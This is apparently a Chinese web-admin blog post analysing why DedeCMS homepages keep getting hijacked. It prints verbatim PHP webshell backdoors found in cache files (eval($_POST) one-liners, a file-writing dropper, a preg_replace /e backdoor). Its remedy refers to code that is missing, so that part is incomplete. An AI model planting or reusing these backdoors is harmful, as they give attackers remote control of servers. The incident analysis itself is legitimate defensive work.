迷城网络 - 专注于中小企业Linux运维服务

当前位置: 迷城网络 > 建站程序 >

dedecms的首页和index.php老是被修改

时间:2019-03-27 10:50来源: 作者: 点击:
使用建站的时候织梦网站老是被修改,尤其是index.html的页面还有index.php被黑链。真的很头疼,如何解决这个问题呢? 小蚂蚁网,今天探寻一种可以导致被挂黑链的原因。 各种webshell扫描

  使用建站的时候网站老是被修改,尤其是index.html的页面还有index.php被黑链。真的很头疼,如何解决这个问题呢?

网,今天探寻一种可以导致被挂黑链的原因。

 

  各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:

  {dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

  但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

  最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

  <!–

  document.write(“isok<?php @eval($_POST[cmd]);?>”);

  –>

  <!–

  document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

  –>

  <!–

  document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);

  –>

  看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

 

很简单,删除这两个代码


(责任编辑:迷城网络科技)
织梦二维码生成器
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片
栏目列表
推荐内容